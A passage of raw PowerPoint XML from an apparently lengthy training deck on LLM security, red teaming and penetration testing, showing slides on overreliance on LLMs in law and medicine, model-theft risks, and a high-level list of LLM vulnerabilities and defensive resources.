              <a:rPr lang="en-US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Emphasizes the critical need for human oversight to verify and validate LLM outputs to ensure their accuracy and appropriateness in sensitive applications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7365971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B71211-DF67-9682-0163-CAD7C4EC88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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E494B2DE-A670-5603-6978-5603F8C9747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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-211014"/>
            <a:ext cx="12367652" cy="7178974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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A4909EE1-4C39-0A3D-CF00-20BB2E30BB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Overreliance- Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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1" name="Picture 10" descr="A black background with a black square&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640C6190-3748-9468-1A05-8C4F3849CA53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2789" y="2297877"/>
            <a:ext cx="1045910" cy="1045910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A black background with a black square&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090C648-F107-CE0F-6C95-E7B9029951C0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2789" y="4648443"/>
            <a:ext cx="1045910" cy="1045910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14AB6B88-4473-56F4-DC3F-A5B2990D714E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1801854"/>
            <a:ext cx="555317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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Legal Professionals Using AI for Document Drafting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D6592CF-C394-D690-946D-411472AF2C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="4145723"/>
            <a:ext cx="599623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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Medical Professionals Using AI for Diagnostic Support</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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FC49DED8-A724-3FD5-E4D5-F5BCB69C218E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196445" y="3316527"/>
            <a:ext cx="2931736" cy="0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28AB2CD1-6339-BBEC-4531-45E157A63D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196445" y="5667093"/>
            <a:ext cx="2931736" cy="0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1D82D522-3223-7C5F-804E-6BFF06C6D713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6834433" y="3316527"/>
            <a:ext cx="2931736" cy="0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F24A1DE2-84D2-FBB3-890A-C3E4584FEC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6834433" y="5667093"/>
            <a:ext cx="2931736" cy="0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3399B158-1CBE-0B38-E39D-67649710EF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336955" y="2809241"/>
            <a:ext cx="265403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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Document Drafting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BB28083-3E10-A3AE-3F3E-3A3BBEA31026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695619" y="5159584"/>
            <a:ext cx="193338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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Diagnose illness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7379F199-4D65-060C-94E7-1A98A0159B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837414" y="3470478"/>
            <a:ext cx="107696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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lawyer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642D051C-B433-D0F2-3FFA-00E21F346DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837414" y="5821043"/>
            <a:ext cx="107696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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Doctor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90F4B9F6-81D4-BB3A-8E65-824F2A261450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491087" y="3470478"/>
            <a:ext cx="107696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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLM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3FCC7ACB-6515-5B0E-160E-D6AFE3B5E625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9587521" y="3470478"/>
            <a:ext cx="193796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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legal Disputes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676C5351-A93C-54C3-F18D-2029931525D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9587521" y="5821043"/>
            <a:ext cx="193796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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backend Services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4BA7BE9E-F8F9-B97E-F26E-821041E928AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491087" y="5821043"/>
            <a:ext cx="107696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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLM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0819C207-2559-98A4-ED71-5D45AE9D0DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6973282" y="2820832"/>
            <a:ext cx="265403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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output Misinformation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2C68D37B-4AFD-5195-8AD5-A0C1982F39AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960268" y="5165874"/>
            <a:ext cx="265403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IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misreading Symptom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A person in a suit and tie with scales of justice&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C275BE-6228-1682-F06E-4CB59C76FFB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463" y="2220261"/>
            <a:ext cx="1185678" cy="1185678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A cartoon of a person&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38352585-B587-57B1-0CA2-47B1785FD72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95736" y="4581191"/>
            <a:ext cx="1160316" cy="1160316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A graphic of a document with a shield and a gavel&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392677D0-125C-4E44-5197-83E2A270D8D2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0300" y="2219584"/>
            <a:ext cx="1192402" cy="1192402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A cartoon of a person with a sweat on his forehead&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD15289B-1B51-7CFD-2C71-406EC2001ACC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52806" y="4613653"/>
            <a:ext cx="1207390" cy="12073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2305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B62B1B-70A7-77E7-4D30-90B7AE38AF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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8772E918-74C1-A412-9360-3E78D589616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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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64570B63-0CBD-0063-D5B0-7CBB532BBE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Model Theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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3B0D08BE-3741-6BBB-BCBD-84081EA18C2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625601"/>
            <a:ext cx="10832185" cy="4247298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Risks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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🚫 IP Theft: Lose years of R&amp;D.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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💸 Economic Loss: Competitors undercut you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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📉 Reputation Damage: "Our AI was stolen!" headlines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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🔒 Privacy Breaches: Sensitive training data exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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chemeClr val="tx2">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Protections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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🛡️ Security Program: Access controls, encryption, monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114885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F0A220B-E33E-1A94-F69B-6698FC91F4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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1270814D-A709-6278-8A80-74CF602BAF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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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3EE4A008-F6B1-871E-6231-4EBA1360AF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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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CUSTOMIZING LLM SAFETY: No Universal Fix</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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88250CE-0225-8332-193D-F93B67FFDDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1700661"/>
            <a:ext cx="9486899" cy="28895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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🎯 Industry-Specific Risks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Zombie diagnoses 💀 | Leaky credit cards 💸</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🛡️ Tools for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"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Inter"/>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>OWASP Top 10 | AI Incident DB | AVID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🔧 Action Steps</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Test | Filter | Learn from fails 🔄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4AE6B0B-E102-E5D6-01C5-D40C879A8FB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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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2067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A7C420-6FCB-69C2-CEA5-83CEB09617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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6C346B-8955-B762-EAB3-0E5C189CC8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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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4E4DA8D6-D7C8-6177-64A8-1E331CC9E5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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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KEY LLM VULNERABILITIES</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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CE321FA-9107-43CC-7EAF-0C071CE540D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1700661"/>
            <a:ext cx="9486899" cy="38533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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>⚖️ Bias &amp; Stereotypes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Parrots repeating bad habits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🔓 Sensitive Info Leaks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Diaries the AI shouldn’t read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🚧 Service Disruption</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Hackers causing traffic jams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>💭 Hallucinations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Creative (but dangerous) storytellers.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B83A2DA-7791-5511-2DB1-A8A80A115E8D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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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39499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7010</TotalTime>
  <Words>4635</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>596</Paragraphs>
  <Slides>77</Slides>
  <Notes>65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77</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Inter</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>What Are LLM</vt:lpstr>
      <vt:lpstr>Why LLMs Are Vulnerable</vt:lpstr>
      <vt:lpstr>PENETRATION TESTING: Your Cybersecurity Fire Drill</vt:lpstr>
      <vt:lpstr>Why Penetration Testing Matters</vt:lpstr>
      <vt:lpstr>RED TEAMING vs. PENETRATION TESTING</vt:lpstr>
      <vt:lpstr>BENCHMARKS ≠ SAFETY: The AI Misconception</vt:lpstr>
      <vt:lpstr>FOUNDATION MODELS vs. REAL-WORLD APPS</vt:lpstr>
      <vt:lpstr>CUSTOMIZING LLM SAFETY: No Universal Fix</vt:lpstr>
      <vt:lpstr>KEY LLM VULNERABILITIES</vt:lpstr>
      <vt:lpstr>Demo LLM Application Overview</vt:lpstr>
      <vt:lpstr>Demo Red Teaming LLM</vt:lpstr>
      <vt:lpstr>Bias &amp; Stereotype</vt:lpstr>
      <vt:lpstr>Bias &amp; Stereotype</vt:lpstr>
      <vt:lpstr>Bias &amp; Stereotype</vt:lpstr>
      <vt:lpstr>Sensitive Information Disclosure</vt:lpstr>
      <vt:lpstr>Sensitive Information Disclosure</vt:lpstr>
      <vt:lpstr>Penetration Testing Process</vt:lpstr>
      <vt:lpstr>EXPLOITATION PHASE: Turning Flaws into Firepower</vt:lpstr>
      <vt:lpstr>POST-EXPLOITATION: How Deep Can Hackers Go?</vt:lpstr>
      <vt:lpstr>Penetration Test Reporting</vt:lpstr>
      <vt:lpstr>Final Stage: Remediation &amp; Reporting</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK Framework</vt:lpstr>
      <vt:lpstr>Pyramid of Pain</vt:lpstr>
      <vt:lpstr>TTPs (Tactics, Techniques, and Procedures)</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Network/ Host Artifacts</vt:lpstr>
      <vt:lpstr>Domain Names</vt:lpstr>
      <vt:lpstr>IP Addresses</vt:lpstr>
      <vt:lpstr>Hash Values</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Matrices</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Tactics</vt:lpstr>
      <vt:lpstr>Reconnaissance – Surveying the Scene</vt:lpstr>
      <vt:lpstr>Resource Development: Building the Arsenal</vt:lpstr>
      <vt:lpstr>Initial Access – Breaching the Defenses</vt:lpstr>
      <vt:lpstr>Execution: Running the Malicious Code</vt:lpstr>
      <vt:lpstr>Persistence: Hiding in Plain Sight</vt:lpstr>
      <vt:lpstr>Privilege Escalation – Gaining Higher Access</vt:lpstr>
      <vt:lpstr>Defense Evasion – Staying Under the Radar</vt:lpstr>
      <vt:lpstr>Credential Access: Grabbing the Keychain</vt:lpstr>
      <vt:lpstr>Discovery – Mapping the Treasure</vt:lpstr>
      <vt:lpstr>Lateral Movement – Expanding Their Reach</vt:lpstr>
      <vt:lpstr>Collection: Packing the Loot</vt:lpstr>
      <vt:lpstr>Command &amp; Control: The Getaway Car</vt:lpstr>
